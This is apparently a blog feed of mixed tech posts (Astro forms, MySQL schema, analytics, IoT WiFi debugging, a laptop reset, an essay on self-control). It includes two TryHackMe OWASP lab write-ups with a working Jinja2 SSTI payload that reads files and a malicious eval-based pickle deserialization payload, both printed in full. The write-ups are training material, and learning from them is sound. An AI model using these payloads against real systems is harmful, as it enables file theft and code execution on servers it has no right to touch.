The Fix: You can ensure your site property in astro.config.mjs matches your production URL exactly. Alternatively, if you're behind a proxy that strips or modifies headers, you can disable this check:

// astro.config.mjs
export default defineConfig({
  // ...
  security: {
    checkOrigin: false
  }
});

The "Honeypot" Technique: Invisible Security

One of my favorite tricks included in this setup is the Honeypot field. We add a hidden input that is invisible to humans but visible to bots. If a bot fills it out, the server immediately rejects the request without even calling the email API. It's a silent, effective killer for 90% of automated spam.

The Implementation: From Client to Inbox

To understand how this template works, here is the journey of a single form submission:

User fills the form: Client-side validation (HTML5) does a quick check.
JavaScript Interception: The browser prevents a full-page reload and sends data via Astro Actions.
Honeypot Check: The server checks if the "hidden" field is filled. If yes -> Reject.
Rate Limit Check: Redis (Upstash) checks the user's IP. If too many requests -> Reject.
Zod Validation: Server-side schema validation ensures data is clean.
Email Dispatch: Resend API sends the data to your inbox.
UI Feedback: The user sees a success message without the page flickering.

1. The Server Action (The Brain)

// src/actions/index.ts
import { Resend } from "resend";
import { Redis } from "@upstash/redis";

const resend = new Resend(import.meta.env.RESEND_API_KEY);
const redis = new Redis({
  url: import.meta.env.UPSTASH_REDIS_REST_URL,
  token: import.meta.env.UPSTASH_REDIS_REST_TOKEN,
});

export const server = {
  send: defineAction({
    accept: "form",
    input: z.object({
      name: z.string().min(3),
      email: z.string().email(),
      company: z.string().optional(), // Honeypot
    }),
    handler: async ({ name, email, company }, context) => {
      // 1. Honeypot check
      if (company) throw new ActionError({ code: "BAD_REQUEST" });

      // 2. Rate limiting (Upstash Redis)
      const ip = context.request.headers.get("x-forwarded-for") || "unknown";
      const { success } = await redis.incr(`limit:${ip}`);
      // (Add logic to check count and set expiry here)

      // 3. Send email (Resend)
      await resend.emails.send({
        from: import.meta.env.RESEND_EMAIL,
        to: import.meta.env.FROM_EMAIL,
        subject: `New Message from ${name}`,
        text: `Sender: ${email} \nMessage: ...`,
      });

      return { success: true };
    }
  })
};

2. The Form UI (The Face)

<!-- src/components/sections/contact/ContactForm.astro -->
<form id="contact-form">
  <!-- Invisible to humans -->
  <input name="company" style="display:none" tabindex="-1" />
  
  <input name="name" required />
  <input name="email" type="email" required />
  
  <button id="submit-btn">Submit</button>
</form>

3. The Submission Logic (The Bridge)

// Client-side Script
const { error } = await actions.send(new FormData(form));

if (error) {
  // Show error in UI
} else {
  // Show success and reset form
}

Conclusion

By combining Astro 5 Actions, Resend, and Upstash, we’re building more than a form. We’re building a secure, reliable gateway for your business.

If this helped you level up your production mindset, give it a clap, share it with fellow devs, and follow for more practical, security-focused breakdowns.

Designing a MySQL Database for B2B Energy Products

Thu, 19 Feb 2026 00:00:00 GMT

1. Introduction

In this article, we will walk through how to design and implement a MySQL database for a B2B project that manages electrical materials and renewable energy products.

The system will handle:

Core product data (SKU, price, stock, etc.)
Multi-level categories (category → subcategory → sub-subcategory)
Brand management
Tier pricing (volume-based pricing)
Multi-currency support (USD & IDR/Rupiah)

This design follows relational database best practices: normalization, foreign keys, indexing, and scalability.

2. System Overview

The project is a B2B product catalog + pricing engine for materials such as:

Cables
Circuit breakers
Solar panels
Inverters
Battery systems
Switchgear
Renewable energy components

Because this is B2B, it requires:

Tier pricing (bulk discount)
Multiple currencies (USD & IDR)
Clear product hierarchy
Brand-based filtering
Stock and MOQ control

3. System Architecture Diagram (ASCII)

System Flow (User → Database)

+-------------------+
|   B2B Customer    |
+---------+---------+
          |
          v
+-------------------+
|   Web / API App   |
| (Laravel / Node)  |
+---------+---------+
          |
          v
+-------------------+
|   Business Logic  |
| - Pricing Engine  |
| - Tier Calculation|
| - Currency Logic  |
+---------+---------+
          |
          v
+-------------------+
|      MySQL DB     |
|-------------------|
| products          |
| brands            |
| categories        |
| tier_prices       |
| product_categories|
+-------------------+

Product Data Relationship Flow (Database Structure)

                 +----------------+
                 |    brands      |
                 |----------------|
                 | id (PK)        |
                 | name           |
                 +--------+-------+
                          |
                          |
                          v
+----------------+    +----------------+
|   categories   |    |    products    |
|----------------|    |----------------|
| id (PK)        |    | id (PK)        |
| name           |    | sku            |
| parent_id (FK) |    | product_name   |
+--------+-------+    | brand_id (FK)  |
         |            | price_usd      |
         |            | price_idr      |
         |            +--------+-------+
         |                     |
         |                     v
         |            +----------------+
         |            |  tier_prices   |
         |            |----------------|
         |            | product_id (FK)|
         |            | min_qty        |
         |            | price_usd      |
         |            | price_idr      |
         |            +----------------+
         |
         v
+----------------------+
| product_categories   |
|----------------------|
| product_id (FK)      |
| category_id (FK)     |
+----------------------+

Tier Pricing Logic Flow (Business Logic)

Customer selects quantity (Q)
              |
              v
Fetch all tier_prices
ORDER BY min_qty DESC
              |
              v
Find first tier where:
Q >= min_qty
              |
              v
Apply tier price
              |
              v
Return final price (USD / IDR)

Category Hierarchy Logic

Electrical
   |
   +-- Cable
   |      |
   |      +-- Solar Cable
   |
   +-- Circuit Breaker
   |
   +-- Renewable Energy
          |
          +-- Solar Panel
          +-- Inverter

4. Database Design

We will design the following tables:

Main Tables

products
brands
categories
product_categories
tier_prices

Optional extension:

currencies
product_documents

5. Table Implementation

Category Structure

Since we have:

Category
Sub Category
Sub Sub Category

We will use a self-referencing (adjacency list) model.

categories table

CREATE TABLE categories (
    id INT AUTO_INCREMENT PRIMARY KEY,
    name VARCHAR(100) NOT NULL,
    parent_id INT NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (parent_id) REFERENCES categories(id)
);

How it works

| id | name | parent_id | | -- | ----------- | --------- | | 1 | Electrical | NULL | | 2 | Cable | 1 | | 3 | Solar Cable | 2 |

This allows unlimited depth while keeping schema simple.

Brand Table

CREATE TABLE brands (
    id INT AUTO_INCREMENT PRIMARY KEY,
    name VARCHAR(100) NOT NULL UNIQUE,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);

Products Table

This is the core of the system.

Required Fields

SKU
Product Name
Description / Specification
Datasheet
Price (USD & IDR)
Stock
Unit
MOQ
Brand reference

CREATE TABLE products (
    id INT AUTO_INCREMENT PRIMARY KEY,
    sku VARCHAR(50) NOT NULL UNIQUE,
    product_name VARCHAR(255) NOT NULL,
    description TEXT,
    datasheet_url VARCHAR(255),

    price_usd DECIMAL(15,2) NOT NULL,
    price_idr DECIMAL(18,2) NOT NULL,

    stock INT DEFAULT 0,
    unit VARCHAR(50) NOT NULL,
    moq INT DEFAULT 1,

    brand_id INT,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,

    FOREIGN KEY (brand_id) REFERENCES brands(id)
);

Product–Category Relationship

A product may belong to multiple categories.

CREATE TABLE product_categories (
    product_id INT,
    category_id INT,
    PRIMARY KEY (product_id, category_id),
    FOREIGN KEY (product_id) REFERENCES products(id) ON DELETE CASCADE,
    FOREIGN KEY (category_id) REFERENCES categories(id) ON DELETE CASCADE
);

6. Tier Pricing Logic

This is critical in B2B.

Example:

1–9 units: $100
10–49 units: $90
50+ units: $80

CREATE TABLE tier_prices (
    id INT AUTO_INCREMENT PRIMARY KEY,
    product_id INT NOT NULL,
    min_qty INT NOT NULL,
    price_usd DECIMAL(15,2) NOT NULL,
    price_idr DECIMAL(18,2) NOT NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (product_id) REFERENCES products(id) ON DELETE CASCADE
);

Example Data

| product_id | min_qty | price_usd | price_idr | | ---------- | ------- | --------- | --------- | | 1 | 1 | 100.00 | 1500000 | | 1 | 10 | 90.00 | 1350000 | | 1 | 50 | 80.00 | 1200000 |

7. Query Examples

INSERT INTO brands (name)
VALUES ('Schneider Electric');

INSERT INTO products (
    sku,
    product_name,
    description,
    datasheet_url,
    price_usd,
    price_idr,
    stock,
    unit,
    moq,
    brand_id
) VALUES (
    'MCB-SCH-16A',
    'Miniature Circuit Breaker 16A',
    '1P 16A MCB for residential and industrial use',
    'https://example.com/datasheet.pdf',
    25.00,
    375000,
    500,
    'pcs',
    10,
    1
);

Get Product With Tier Price

SELECT p.product_name, t.min_qty, t.price_usd
FROM products p
JOIN tier_prices t ON p.id = t.product_id
WHERE p.sku = 'MCB-SCH-16A'
ORDER BY t.min_qty ASC;

Get All Solar Category Products

SELECT p.product_name
FROM products p
JOIN product_categories pc ON p.id = pc.product_id
JOIN categories c ON pc.category_id = c.id
WHERE c.name = 'Solar Cable';

Multi-Currency Strategy

Two approaches:

Approach A: Store Both USD & IDR (Simple)

✔ Fast

✔ No conversion needed

❌ Must manually update exchange rates

Approach B: Store USD Only + Exchange Rate Table

CREATE TABLE exchange_rates (
    currency_code VARCHAR(10) PRIMARY KEY,
    rate_to_usd DECIMAL(15,6),
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);

Then convert dynamically.

For B2B in Indonesia, storing both USD & IDR is usually practical.

10. Performance Considerations

Add indexes:

CREATE INDEX idx_sku ON products(sku);
CREATE INDEX idx_category_parent ON categories(parent_id);
CREATE INDEX idx_tier_product ON tier_prices(product_id);

For large datasets:

Use pagination
Avoid SELECT *
Consider caching tier pricing

Scaling for Real B2B

To make it production-ready:

Add:

customers
customer_groups
Custom pricing per group
Order management
Quotation system
API layer
Soft delete column

Final Architecture Summary

This MySQL design provides:

Structured hierarchical categories
Brand management
Multi-currency pricing
Tier pricing for bulk
Clean relational design
Scalable B2B foundation

It is optimized for:

Electrical material distributors
Renewable energy suppliers
Solar project vendors
Industrial procurement platforms

OWASP Top 10 2025: Insecure Data Handling | TryHackMe

Thu, 19 Feb 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on OWASP Top 10 2025: Insecure Data Handling.

I documented the steps I took, the payloads I tested, and the reasoning behind each move. Hopefully this write-up helps anyone who is currently learning or reviewing OWASP Top 10 concepts in a practical way.

Task 1: Introduction

This room covers three elements of the OWASP Top 10 (2025) list related to application behaviour and user input: Cryptographic Failures (A04), Injection (A05), and Software or Data Integrity Failures (A08). You will learn about these vulnerabilities, how to prevent them, and practice exploiting them using a deployed Virtual Machine.

I'm ready!

No answer needed

Task 2: A04: Cryptographic Failures

Cryptographic failures occur when sensitive data is not adequately protected due to weak encryption algorithms (like MD5 or SHA1), lack of hashing, or poor key management. Prevention involves using strong, modern algorithms (like bcrypt for passwords) and never embedding credentials in source code. The practical exercise involves a note-sharing app using a weak shared key.

Decrypt the encrypted notes. One of them will contain a flag value. What is it?

Here we can open the page called Crypto Lab: Weak XOR Cipher. Then we can use CyberChef to decrypt the codes.

We can use From Base64 and XOR, then for the key_ we can try different values and eventually find the correct key1.

And the flag is found in confidential #3.

THM{REDACTED}

Task 3: A05: Injection

Injection happens when an application processes untrusted user input directly into a system (like a database or shell) without sanitization. Common types include SQL Injection, Command Injection, and Server Side Template Injection (SSTI). To prevent this, input should always be treated as untrusted, using parameterized queries and strict validation. The practical demonstrates an SSTI attack.

Perform an SSTI attack on the practical. You need to read the contents of flag.txt that is located within the same directory as the web application.

In the notes section, there is an important insight:

Jinja2 templates can access Python objects when not sandboxed.
Look for builtins like config, request, cycler, joiner, lipsum.
Try payloads such as {{7*7}} or {{config.items()}} to explore.

From the example shown at the bottom, we can see a payload like: {{ request.application.globals.builtins.open('flag.txt').read() }}

So we just need to adjust it using one of the available objects such as config, request, cycler, joiner, or lipsum. After several attempts, the flag was successfully retrieved using lipsum. {{ lipsum.globals.builtins.open('flag.txt').read() }}

THM{REDACTED}

Task 4: A08: Software or Data Integrity Failures

This vulnerability occurs when applications rely on code, updates, or data without verifying their integrity or origin (e.g., unverified software updates or insecure deserialization). Prevention requires establishing trust boundaries and using cryptographic checks (checksums) to verify artifacts. The practical demonstrates a Python deserialization attack using the pickle module.

Use Python to pickle a malicious, serialised payload that reads the contents of flag.txt and submits it to the application. What are the contents of flag.txt?

When we open IP_MACHINE:8002, the solution is actually already provided. So we just need to run the given Python script.

import pickle
import base64

class Malicious:
    def __reduce__(self):
        # Return a tuple: (callable, args)
        # This will execute: open('flag.txt').read()
        return (eval, ("open('flag.txt').read()",))

# Generate and encode the payload
payload = pickle.dumps(Malicious())
encoded = base64.b64encode(payload).decode()
print(encoded)

Run the script in Python until the encoded string is generated, then simply copy and paste it into the web deserialization field.

gASVMwAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwXb3BlbignZmxhZy50eHQnKS5yZWFkKCmUhZRSlC4=

And we successfully obtain the flag.

THM{REDACTED}

Self-Control Is the First Leadership Test

Wed, 18 Feb 2026 00:00:00 GMT

Marcus Aurelius once wrote that a man who cannot rule his desires is unfit to rule anything at all.

That line sounds dramatic, until you realize how small the battlefield actually is.

Desire doesn’t arrive as some grand moral test. It begins quietly. A chemical surge. An image. A sensation. A suggestion. In milliseconds, your brain lights up and offers you a shortcut to pleasure.

The real question is not whether desire appears.

The real question is: who responds?

The Smallest Arena

We often talk about leadership in public terms — money, business, family, influence. But leadership begins in the smallest arena: yourself.

If you cannot control a passing impulse, how will you control a budget?
If you cannot discipline your attention, how will you guide a team?
If you cannot master your urges, how will you protect what you love?

Self-control is not about appearing righteous. It is about being reliable.

A man ruled by impulse is predictable. And a predictable man is easy to manipulate by media, by temptation, by circumstance.

That is not strength. That is dependency.

Why It Matters More Than Ever

I am a father to a daughter.

That changes the weight of this conversation entirely.

Because now self-control is not abstract philosophy. It is example.

One day she will measure men against the standard she saw at home.
One day she will form expectations based on how I carried myself.
One day she will decide what kind of behavior is normal and acceptable.

If I cannot govern my own desires, what exactly am I teaching?

Control over lust is not repression. It is protection of clarity, of dignity, of stability.

It is the difference between being driven and being directed.

Discipline in the Unseen Moments

The most important battles are invisible.

No one applauds when you close the tab.
No one congratulates you for resisting distraction.
No one knows when you choose restraint.

But those moments build something internal: sovereignty.

Every act of discipline strengthens your claim over your own mind. And the man who governs his mind governs his actions. And the man who governs his actions becomes trustworthy.

Trust is the currency of leadership.

Lose control privately, and eventually it leaks publicly.

Rule or Be Ruled

We like to believe we are free. But freedom without self-mastery is illusion. If your behavior can be steered by stimulation, you are not in control, you are being controlled.

To rule your life, you must first rule your impulses.

Because the man who cannot command himself cannot be trusted with command.

And leadership whether over a company, a household, or a future — always begins within.

A Reflection from Imam Al-Ghazali

The nafs is like a wild horse. If you do not train it, it will throw you. But if you discipline it, it will carry you to your destination.

Self-mastery, then, is not denial — it is direction.
What you fail to govern will eventually govern you.

Fixing a Locked Laptop Without Reinstalling

Mon, 16 Feb 2026 00:00:00 GMT

It started with a simple request from my manager:

“Can you fix my laptop? I forgot the PIN. If the disk gets wiped, it’s fine.”

Classic situation. Forgotten PIN, locked login screen, mild panic.

At that moment, I didn’t even know what exact Windows version it was. It looked like Windows 11, but I didn’t check the version explicitly. The laptop wasn’t brand new, so it could have been upgraded at some point. Either way, the core issue was the same: we couldn’t get past the login screen.

Forcing Recovery Mode

Since we were stuck at login, I triggered Windows Recovery by forcing shutdown three times in a row. That’s actually a built-in behavior: Windows detects repeated failed boots and loads the recovery environment.

Soon, the blue Recovery screen appeared.

From there:

Troubleshoot
Reset this PC

That’s where things got interesting.

The Temptation of the Old Way

My first instinct?

“Should I just grab a flash drive and use Rufus like the old days?”

Honestly, I was ready to go the classic route:

Download ISO
Create bootable USB with Rufus
Enter BIOS
Boot from USB
Clean install

But then I thought… do I really want to go through all that setup again? Drivers, updates, extra configuration. It works, sure. But it’s tedious. And I wasn’t exactly in the mood for a full ritual reinstall.

Sometimes laziness is just efficiency in disguise.

The License Clue

While checking the device, I noticed the Windows logo on the back of the laptop. That usually indicates an embedded OEM license.

That changed my mindset.

If the device already had a valid Windows license tied to the hardware, there was no strong reason to go full USB reinstall. The built-in recovery should handle everything cleanly and reactivate automatically.

So instead of overengineering the solution, I chose the practical path.

The Reset Decision

Inside Reset this PC, Windows offered:

Keep my files
Remove everything

I initially tried the “Keep my files” route. It required Microsoft account authentication. But because of earlier connectivity limitations and the locked state, it wasn’t the smoothest path.

Since my manager had already said wiping the disk was fine, I chose:

Remove files (standard reset) —not the deep, fully secure wipe that takes much longer.

Shortly after confirming, the screen showed the Lenovo logo with the word:

Resetting

That’s the point of no return.

Back to First-Time Setup

After the reset, the laptop booted into the familiar first-time Windows setup flow:

Region selection
Keyboard layout
Network connection
Microsoft account login

At that point, it became clear that the device was actually running Windows 10, but I didn’t double-check the exact version number.

Activation happened automatically, no product key drama. That confirmed the license was indeed embedded in the device.

We signed back into the Microsoft account, set a new PIN, and within a short time, everything was working again.

What This Small Task Revealed

This wasn’t a complex IT project. But it was a reminder:

Not every problem requires the most technical solution.
Built-in recovery tools are more powerful than we assume.
USB reinstall is reliable—but often unnecessary.
Sometimes the “lazy” path is actually the most efficient one.

In the end, what started as a locked laptop turned into a simple reset and clean setup. No Rufus. No BIOS tweaking. No overkill.

Just practical problem-solving.

👋 If you enjoy real-world tech stories like this, follow for more practical lessons from everyday troubleshooting

OWASP Top 10 2025: Design Flaws | TryHackMe

Sun, 15 Feb 2026 00:00:00 GMT

This write-up documents my approach to completing the TryHackMe room: OWASP Top 10 2025: Application Design Flaws

Task 1: Introduction

This room covers four categories of the OWASP Top 10 2025 that are closely related to architecture and system design weaknesses:

Security Misconfigurations (AS02)
Software Supply Chain Failures (AS03)
Cryptographic Failures (AS04)
Insecure Design (AS06)

These categories highlight how flawed assumptions, weak configurations, and poor architectural decisions can compromise entire systems.

I am ready to learn about design flaw vulnerabilities!

No answer needed

Task 2: AS02: Security Misconfigurations

Security misconfigurations occur when systems are deployed with unsafe defaults, incomplete configurations, or exposed services. Examples include:

Default passwords left unchanged
Public cloud storage buckets
Debug mode enabled in production
Unnecessary services exposed to the internet

Proper mitigation requires:

Hardening default configurations
Enforcing the principle of least privilege
Keeping systems and dependencies up to date
Performing regular security audits

What's the flag?

First, navigate to:

http://IP_MACHINE:5002/

The application exposes a user lookup endpoint:

/api/user/<user_id>

Step 1: Testing the Endpoint

Accessing a valid user ID:

http://IP_MACHINE:5002/api/user/123

The API returns normal user information in JSON format.

This confirms that the endpoint directly processes user-supplied input without authentication.

Step 2: Testing Input Validation

Next, we test how the application handles malformed input by modifying the user ID:

http://IP_MACHINE:5002/api/user/1%10

This payload includes an unexpected encoded character (%10) to test how the backend handles invalid input.

Step 3: Exploiting the Misconfiguration

The server fails to properly validate the input and reveals unintended information.

As a result, the flag is exposed:

THM(...)

Task 3: AS03: Software Supply Chain Failures

Software supply chain failures occur when applications rely on compromised, outdated, or unverified third-party components, libraries, or AI models.

To secure the supply chain, developers must:

Verify third-party components
Sign and audit updates
Secure CI/CD pipelines
Monitor dependencies for known vulnerabilities

What's the flag?

Challenge Overview

We were asked to identify and exploit a vulnerability in a Data Processing Service that imports an outdated third-party component:

lib/vulnerable_utils.py

The service exposed two endpoints:

POST /api/process GET /api/health

The health endpoint returned normal status, so the focus shifted to:

/api/process

Step 1: Normal Input Testing

Sending normal input:

{"data":"test"}

Response:

{
  "result": "Output: TEST",
  "status": "success"
}

Observations:

The input is converted to uppercase.
Errors are returned directly in JSON format.

Step 2: Error Triggering

Sending malformed input:

null

Response:

'NoneType' object has no attribute 'get'

This revealed:

The application calls request.json.get("data")
There is no validation on request.json
Raw exception messages are exposed to the user

This confirmed weak error handling and improper input validation.

Step 3: Reviewing the Source Code

After reviewing the application logic, we found:

if data == 'debug':
    return jsonify(debug_info())

The application contained a hidden debug backdoor.

This meant that sending "debug" as input would trigger internal debug functionality.

Step 4: Exploitation

Sending:

{"data":"debug"}

The response revealed sensitive internal information, including the flag:

THM(...)

Task 4: AS04: Cryptographic Failures

Cryptographic failures occur when encryption is implemented incorrectly or not implemented at all. Examples include:

Weak algorithms such as MD5 or SHA-1
Hard-coded encryption keys
Using insecure modes like ECB
Failing to encrypt sensitive data in transit or at rest

Prevention requires:

Using modern cryptographic standards (AES-GCM, TLS 1.3)
Secure key management solutions
Regular key rotation
Avoiding hard-coded secrets

What's the flag?

The page displayed:

Secure Document Viewer
Decryption feature unavailable
Encrypted Document:
Nzd42HZGgUIUlpILZRv0jeIXp1WtCErwR+j/w/lnKbmug31opX0BWy+pwK92rkhjwdf94mgHfLtF26X6B3pe2fhHXzIGnnvVruH7683KwvzZ6+QKybFWaedAEtknYkhe

Step 1: Inspecting the Source

We found:

<script src="/static/js/decrypt.js"></script>

So we accessed:

http://IP_MACHINE:5004/static/js/decrypt.js

Inside the file, we discovered:

Key: my-secret-key-16
Mode: AES-128-ECB

This is a clear cryptographic failure:

Hard-coded encryption key
Insecure ECB mode
Client-side exposure of secrets

Step 2: Decrypting the Data

We used Python:

from Crypto.Cipher import AES
import base64

key = b"my-secret-key-16"

ciphertext = base64.b64decode(
"Nzd42HZGgUIUlpILZRv0jeIXp1WtCErwR+j/w/lnKbmug31opX0BWy+pwK92rkhjwdf94mgHfLtF26X6B3pe2fhHXzIGnnvVruH7683KwvzZ6+QKybFWaedAEtknYkhe"
)

cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)

print(plaintext.decode('utf-8').rstrip("\x00"))

The flag was successfully decrypted:

THM(...)

Task 5: AS06: Insecure Design

Insecure design refers to architectural or logic flaws that are built into the system from the beginning. These flaws result from:

Poor threat modeling
Incorrect assumptions
Missing authorization checks
Weak separation of trust boundaries

What's the flag?

The application claimed to be “mobile-only.” However, this restriction existed only at the UI level.

Step 1: Directory Enumeration

We used Gobuster:

gobuster dir \
-u http://IP_MACHINE:5005 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-t 20

Since the scan was slow, we targeted the /api path directly:

gobuster dir \
-u http://IP_MACHINE:5005/api \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-t 20

We discovered:

/api/users

Step 2: Accessing the API Directly

curl http://IP_MACHINE:5005/api/users

Response:

{
  "admin": {
    "email": "admin@example.com",
    "name": "Admin",
    "role": "admin"
  },
  ...
}

This confirmed that the backend API was accessible without authentication.

Step 3: Accessing Admin Messages

Eventually, the flag was found at:

curl http://IP_MACHINE:5005/api/messages/admin

THM(...)

This demonstrates insecure design: The system assumed only mobile clients would access the API, but no authentication or authorization was enforced on the backend.

Task 6: Conclusion

Security design failures stem from weak architectural foundations. Security cannot be effectively “patched in” at the end of development.

Strong systems require:

Clear security requirements
Realistic threat modeling
Proper authentication and authorization
Secure configuration management
A secure-by-design approach from the start

I'm ready for the next room!

No answer needed

Pro Google Analytics in Astro with Partytown

Fri, 13 Feb 2026 00:00:00 GMT

Integrating Google Analytics into Astro is relatively straightforward. However, if you're aiming for better performance and compatibility with features like View Transitions, you may need some additional configuration.

Production Note: This guide is based on experiments I ran on farros.co. At the moment, Google Analytics is not installed there due to several considerations that will be discussed later.

This article continues from Add Google Analytics to Astro: The Complete Guide. Here, we’ll refactor the setup using Partytown to offload third-party scripts, handle View Transitions more carefully, and update around five files.

The Strategy: Performance & Accuracy

The general objective here focuses on two areas:

Performance: Try to reduce the chance of Google Analytics affecting the main thread by using Astro's Partytown integration.
Accuracy: Make sure page navigations are tracked properly, especially when using Astro's client-side routing (View Transitions).

Step 1: Configure Partytown (`astro.config.ts`)

First, we configure Astro to process third-party scripts with Partytown.

The File: astro.config.ts

This is your project's central configuration file. Here, we add the Partytown integration.

// astro.config.ts
import { defineConfig } from 'astro/config';
import partytown from '@astrojs/partytown';

export default defineConfig({
  // ...other configs
  integrations: [
    // ...other integrations
    partytown({
      config: {
        forward: ['dataLayer.push', 'gtag'],
      },
    }),
  ],
});

partytown({ ... }): Enables the integration.
config: { forward: [...] }: This part creates a bridge for dataLayer.push and gtag from the main thread (where your UI runs) to the web worker where Partytown executes the Google Analytics script. This allows your code to call gtag() as usual, while the heavy lifting happens in a separate thread.

Step 2: Secure Your ID (`.env` & `src/type.d.ts`)

This step follows a common best practice: storing your Measurement ID in environment variables and adding TypeScript typings.

The Files:

.env (in your project root)
src/type.d.ts

1. The .env file:

# .env
PUBLIC_GA_ID=YOUR_MEASUREMENT_ID

The PUBLIC_ prefix tells Astro that this variable can be exposed to client-side scripts.

If your repository is public, avoid committing your actual Measurement ID.

Instead, define the same variable in your deployment environment.

For GitHub Actions:

Go to Repository → Settings
Open Secrets and variables → Actions
Click New repository secret
Add:

PUBLIC_GA_ID = YOUR_MEASUREMENT_ID

This ensures the ID is injected securely at build time without exposing it in the repository.

2. The src/type.d.ts file:

// src/type.d.ts
declare global {
  interface Window {
    dataLayer: Record<string, any>[];
    gtag: (...args: any[]) => void;
  }
}

This setup helps avoid hardcoding your Measurement ID directly in source files.
The TypeScript declaration reduces type warnings during development and improves editor support.

Step 3: Initial Load (`src/components/BaseHead.astro`)

Next, we handle the initial loading of the Google Analytics script inside a head component.

The File: src/components/BaseHead.astro

This component manages everything inside the <head> tag.

---
// src/components/BaseHead.astro
const gaId = import.meta.env.PUBLIC_GA_ID;
---

<!-- ... other head tags ... -->

{/* Google Analytics */}
{
  gaId && import.meta.env.PROD && (
    <>
      <script
        type='text/partytown'
        async
        src={`https://www.googletagmanager.com/gtag/js?id=${gaId}`}
      />
      <script type='text/partytown'>
        {`
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', '${gaId}', { 'send_page_view': false });
        `}
      </script>
    </>
  )
}

Variable Injection: We define const gaId = import.meta.env.PUBLIC_GA_ID; in the frontmatter and then reference ${gaId} inside the template literal. This allows Astro to replace the value at build time. Placing import.meta.env directly inside the string block would likely not work as expected.
Conditional Loading: gaId && import.meta.env.PROD ensures the script only renders when an ID is available and the build is running in production.
Partytown Execution: type='text/partytown' tells Partytown to execute the script inside a web worker, which may help reduce main-thread impact.
Disabling Auto Page Views: gtag('config', ..., { 'send_page_view': false }); turns off automatic page view tracking. This allows us to handle navigation tracking manually, which can be more reliable with View Transitions.

Step 4: Tracking Navigation (`src/layouts/BaseLayout.astro`)

Now we manually send page view events whenever a user navigates.

The File: src/layouts/BaseLayout.astro

We add a small inline script near the end of the <body>.

---
// src/layouts/BaseLayout.astro
---
<html lang="en-US">
  <head>
    <BaseHead />
    {/* ... */}
  </head>
  <body>
    {/* ... page content ... */}

    <script is:inline>
      document.addEventListener('astro:page-load', () => {
        if (typeof window.gtag === 'function') {
          window.gtag('event', 'page_view', {
            page_title: document.title,
            page_location: window.location.href,
          });
        }
      });
    </script>
  </body>
</html>

is:inline: This ensures the script is placed directly into the HTML without bundling. That way, it can safely listen for DOM events.
astro:page-load Event: We use astro:page-load, which generally fires after the page is fully loaded and visible, including after a View Transition completes.
Manual page_view Event: When triggered, we send a page_view event to Google Analytics. The gtag function here is forwarded via Partytown.

Step 5: Deployment (`.github/workflows/deploy.yml`)

Finally, we make sure the Measurement ID is available during the build process. If you're deploying to GitHub Pages, this can be done using GitHub Actions secrets.

The File: .github/workflows/deploy.yml

# .github/workflows/deploy.yml

jobs:
  build:
    runs-on: ubuntu-latest
    env:
      PUBLIC_GA_ID: ${{ secrets.PUBLIC_GA_ID }}
    steps:
      - name: Checkout your repository using git
        uses: actions/checkout@v4
      - name: Install, build, and upload your site
        uses: withastro/action@v2
        # ...

First, go to your GitHub repository’s Settings > Secrets and variables > Actions, then create a New repository secret named PUBLIC_GA_ID with your Measurement ID as its value.
The env: block makes this secret available during the build. The withastro/action@v2 step will then expose it to Astro, allowing import.meta.env.PUBLIC_GA_ID to resolve correctly at build time.

Conclusion

By coordinating these five files, you can build a more performance-aware Google Analytics setup in Astro. While this approach may not be necessary for every project, it can offer better control over tracking behavior, especially in sites that rely on View Transitions and client-side navigation.

If this guide helped you think differently about analytics and performance in Astro, feel free to share it with other builders who care about clean implementations.

Debugging Push SDK on Office WiFi Networks

Thu, 12 Feb 2026 00:00:00 GMT

Deploying a face recognition attendance device sounds simple—connect it to WiFi, point it to the server, and you're done.

In reality? Network policies can turn a 30-minute setup into a full debugging session.

This article documents a real-world deployment of a cloud-connected attendance device, the network issues encountered, and the technical reasoning behind the final diagnosis.

1. Device Overview

The deployed device is a face recognition attendance terminal with:

WiFi (2.4G)
HTTP / HTTPS support
Push SDK integration
Local Web UI configuration
Cloud server connectivity via custom port

Network Capabilities

DHCP or Static IP
DNS configuration
Custom HTTP push port
Push SDK server configuration

This type of device behaves similarly to an IoT endpoint rather than a traditional PC client.

2. Deployment Architecture

Cloud Setup

The device was configured with:

Domain: fvivo.online
Protocol: HTTP
Port: 8001
Push SDK: Enabled

The cloud endpoint responded successfully via browser:

Response:

{"message":"Hello from Server!!!"}

So the server was confirmed operational.

3. Initial Symptoms

When connected to:

✅ Mobile Hotspot

Push SDK → Online
Cloud sync → Working

❌ Office WiFi

Push SDK → Offline
Internet available
DNS resolving
Port reachable from PC

This discrepancy was the key clue.

4. Network Testing & Validation

4.1 Basic Connectivity

From office WiFi:

ping 8.8.8.8

Internet reachable.

4.2 Port Test

Test-NetConnection fvivo.online -Port 8001

Result:

TcpTestSucceeded : True

So:

Port 8001 NOT globally blocked
DNS working
Outbound TCP allowed

Yet the device still showed:

Push SDK Status: Offline

5. Why PC Works but Device Fails

This is where deeper network behavior matters.

Enterprise WiFi networks often apply:

MAC-based policy rules
VLAN segmentation
IoT isolation
Layer 7 filtering
Deep Packet Inspection (DPI)
Application-based firewall rules

PC traffic is recognized as normal browser/client behavior.

IoT traffic (like Push SDK HTTP posts) may be:

Classified differently
Subject to stricter outbound filtering
Blocked by security profile

Even when the port is technically open.

This explains why:

PC → can access port 8001
Device → cannot establish session

Hotspot works because:

No L7 inspection
No security policy
No device classification

6. Why It Was NOT a Port Issue

Many assume port blocking first.

However:

Port 8001 reachable from PC
Server confirmed live
DNS resolving
HTTP response verified

Therefore, traditional firewall port block was ruled out.

The issue was policy-level filtering, not transport-level blocking.

7. The Most Likely Root Causes

Based on behavior:

IoT isolation profile applied to unknown MAC
VLAN separation for non-registered devices
